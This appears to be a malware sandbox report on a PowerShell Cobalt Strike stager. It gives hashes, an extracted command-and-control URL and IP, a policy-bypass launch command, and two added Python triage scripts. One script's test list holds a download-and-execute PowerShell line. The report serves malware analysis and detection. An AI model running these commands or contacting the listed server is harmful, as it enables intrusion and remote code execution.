Analysis
-
max time kernel
114s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system -
submitted
29-03-2023 06:38
Static task
static1
Behavioral task
behavioral1
Sample
33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps1
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps1
Resource
win10v2004-20230220-en
General
-
Target
33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps1
-
Size
26KB
-
MD5
c9ebd0d057c99b70ba8e955a0f51f72f
-
SHA1
ee2323f856b397a7c0ce1feb6677152376e96da5
-
SHA256
33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768
-
SHA512
c8a1b27243b3526acd38052639574a201f82d96dca2c5a3e753d05c75dc5d21a7984cc66bcda04ea27199e846359695c118ba7cf2162d4ca95cc569147bb7d74
-
SSDEEP
384:pIAUl9V5xJCdNz6etOzzodsGeE3WdbSU0jRArxJDZF6boFUUC7+v6fCUqqgCENqn:uAUjKz6r5GeW+bOoCvK/imC6YEaxP
Malware Config
Extracted
cobaltstrike
http://43.136.14.33:50001/GSmV
-
user_agent
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; UHS)
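The stager URI above can be checked against the checksum8 convention that Cobalt Strike inherits from Metasploit's HTTP stagers: the ASCII byte sum of the URI path, modulo 256, is 92 for an x86 stager and 93 for an x64 stager. The following Python is an added triage example and not part of the sandbox report; the example.test URL in it is a constructed benign comparison case.

```python
"""Checksum8 triage check for Cobalt Strike / Metasploit-style stager URIs.

Added example; not part of the sandbox report. The example.test URL below
is constructed as a benign comparison case.
"""
from urllib.parse import urlparse

# Checksum8 values used by Cobalt Strike stager URIs (inherited from
# Metasploit's reverse_http stager convention).
STAGER_CHECKSUMS = {92: "x86 stager", 93: "x64 stager"}


def checksum8(uri_path: str) -> int:
    """Sum of the ASCII byte values of the URI path, modulo 256."""
    return sum(uri_path.encode("ascii")) % 256


def classify_stager_uri(url: str):
    """Return (path, checksum8, label) for a URL.

    The leading slash is stripped because the convention is computed over
    the path characters only; label is None when the checksum does not
    match a known stager value.
    """
    path = urlparse(url).path.lstrip("/")
    cs = checksum8(path)
    return path, cs, STAGER_CHECKSUMS.get(cs)


# The C2 URL extracted from the sample, plus a constructed benign URL.
SAMPLE_URLS = [
    "http://43.136.14.33:50001/GSmV",   # from the report above
    "http://example.test/index.html",   # constructed, benign
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        path, cs, label = classify_stager_uri(url)
        print(f"{url}: path={path!r} checksum8={cs} -> {label or 'no stager match'}")
```

For /GSmV the sum is 71 + 83 + 109 + 86 = 349, and 349 mod 256 = 93, the x64 stager value, which agrees with the x64 platform of the task. Any random four-character path hits one of the two values about once in 128 tries, so treat the match as a triage hint to pair with the other indicators here (the User-Agent, the non-standard port 50001, the follow-on downloads by the same process), not as a standalone verdict.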
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Blocklisted process makes network request 20 IoCs
Processes:
powershell.exe (pid 1768), flows 3, 4, 5, 6, 7, 8, 10, 11, 12, 14, 15, 16, 18, 19, 20, 21, 22, 23, 24, 26 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exe, pid 1768 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exe, pid 1768, Token: SeDebugPrivilege
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps1
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
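The launch command line above weakens the execution policy with -ExecutionPolicy bypass before running the .ps1 from a Temp directory. A detection that only matches the literal string misses the equivalent spellings powershell.exe accepts (a case-insensitive prefix of at least two characters such as -ex or -exec, the short form -ep, and / in place of -). The Python below is an added example, not part of the sandbox report; the command lines marked constructed are invented to exercise those variants.

```python
"""Flag PowerShell command lines that override the execution policy.

Added example; not part of the sandbox report. The command lines marked
'constructed' are made up for illustration.
"""
import re

WEAK_POLICIES = {"bypass", "unrestricted"}


# powershell.exe accepts - or / switches case-insensitively, any prefix of
# -ExecutionPolicy of at least two characters (-ex, -exec, ...), and the
# dedicated short form -ep. A bare -e is -EncodedCommand, not this switch.
def is_execution_policy_switch(token: str) -> bool:
    if token[:1] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name))


def execution_policy_override(cmdline: str):
    """Return the weak policy value ('bypass' or 'unrestricted') set on the
    command line, or None if the policy is not weakened."""
    # Keep double-quoted arguments as single tokens; split the rest on whitespace.
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    for i, tok in enumerate(tokens[:-1]):
        if is_execution_policy_switch(tok):
            value = tokens[i + 1].strip('"').lower()
            if value in WEAK_POLICIES:
                return value
    return None


SAMPLE_CMDLINES = [
    # From the report above
    r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\33d09273dc6cd6f995271202a20e8df2e0579a066db9b0bdcbfff7da7afe3768.ps1",
    # Constructed variants
    "powershell -ep Bypass -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/x')\"",
    r"powershell.exe /exec unrestricted -File C:\tmp\a.ps1",
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\deploy.ps1",
    r"powershell.exe -NoProfile -e ZQBjAGgAbwAgAGgAaQA=",
]


def flag_samples(cmdlines=SAMPLE_CMDLINES):
    """Return (cmdline, policy) pairs for command lines that weaken the policy."""
    flagged = []
    for cmdline in cmdlines:
        policy = execution_policy_override(cmdline)
        if policy:
            flagged.append((cmdline, policy))
    return flagged


if __name__ == "__main__":
    for cmdline, policy in flag_samples():
        print(f"[{policy}] {cmdline}")
```

On the constructed samples the check flags the report's command line plus the -ep and /exec spellings, and leaves the RemoteSigned and -EncodedCommand lines alone. The policy override on its own is common in administrative scripting; in this report it is the combination with a script in AppData\Local\Temp, SeDebugPrivilege being enabled, and 20 outbound flows from the same pid that makes it worth alerting on.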
Network
MITRE ATT&CK Matrix
Downloads
-
memory/1768-58-0x000000001B300000-0x000000001B5E2000-memory.dmp
Filesize: 2.9MB
-
memory/1768-59-0x0000000002470000-0x0000000002478000-memory.dmp
Filesize: 32KB
-
memory/1768-60-0x0000000002960000-0x00000000029E0000-memory.dmp
Filesize: 512KB
-
memory/1768-61-0x0000000002960000-0x00000000029E0000-memory.dmp
Filesize: 512KB
-
memory/1768-62-0x0000000002960000-0x00000000029E0000-memory.dmp
Filesize: 512KB
-
memory/1768-63-0x0000000002960000-0x00000000029E0000-memory.dmp
Filesize: 512KB
-
memory/1768-64-0x0000000002950000-0x0000000002951000-memory.dmp
Filesize: 4KB
-
memory/1768-65-0x0000000002960000-0x00000000029E0000-memory.dmp
Filesize: 512KB
-
memory/1768-66-0x0000000002960000-0x00000000029E0000-memory.dmp
Filesize: 512KB
-
memory/1768-67-0x0000000002960000-0x00000000029E0000-memory.dmp
Filesize: 512KB
-
memory/1768-68-0x0000000002960000-0x00000000029E0000-memory.dmp
Filesize: 512KB